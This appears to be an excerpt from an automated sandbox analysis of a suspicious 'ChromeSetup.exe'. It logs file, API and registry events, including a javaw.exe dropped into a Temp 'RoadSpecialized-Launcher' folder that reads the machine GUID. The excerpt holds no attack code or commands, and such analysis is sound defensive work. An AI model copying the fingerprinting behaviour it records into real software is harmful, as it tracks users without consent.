Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Users\user\Desktop\ChromeSetup.exe Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00406831
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid